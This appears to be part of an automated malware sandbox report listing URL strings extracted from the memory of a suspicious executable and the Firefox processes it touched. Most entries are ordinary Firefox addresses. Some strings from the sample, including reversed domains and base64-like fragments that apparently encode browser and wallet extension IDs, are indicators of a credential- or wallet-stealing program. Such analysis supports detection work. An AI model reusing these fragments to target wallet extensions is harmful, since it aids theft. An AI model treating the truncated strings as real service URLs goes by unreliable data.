Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001F.00000002.2970664695.000001B113680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001F.00000002.2959421322.000001B106A00000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/experiments/screenshots/api.js
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/experiments/screenshots/api.jsWeb
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001F.00000002.3015576756.000001B11D463000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001F.00000002.2984824415.000001B1161D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001F.00000002.2984824415.000001B1161D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001F.00000002.2954167196.000001B1066CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001F.00000002.2954167196.000001B10663A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001F.00000002.2961348345.000001B110F08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2954167196.000001B1066CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001F.00000002.2987356094.000001B1165BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001F.00000002.2987356094.000001B1165BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986979517.000001B116405000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001F.00000002.2962205193.000001B1110E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001F.00000002.2970664695.000001B113680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916983014.000001B112E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/_notifyBackgroundTab/this._backgroundTabScrollPro
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/U.
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001F.00000002.3000161016.000001B1177F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D61B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 0000001F.00000002.3006356102.000001B11BFBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916983014.000001B112E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959421322.000001B106A00000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001F.00000002.3006356102.000001B11BFBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959421322.000001B106A00000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/https://vk.com/
Source: firefox.exe, 0000001F.00000002.2964737783.000001B111A09000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024586000.00003E9C36B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2962205193.000001B1110E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3010160093.000001B11C286000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/x1024
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/startQuery/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/n=c
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3000161016.000001B1177A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001F.00000002.2952630491.000001B104590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 0000001E.00000002.2909846838.000001F5FECF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: 8e8f4571c5.exe, 00000018.00000002.3383993209.0000000006A26000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2952630491.000001B104590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 0000001F.00000002.2952598665.000001B104580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountH
Source: firefox.exe, 0000001F.00000003.2909414064.000001B111826000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHRE
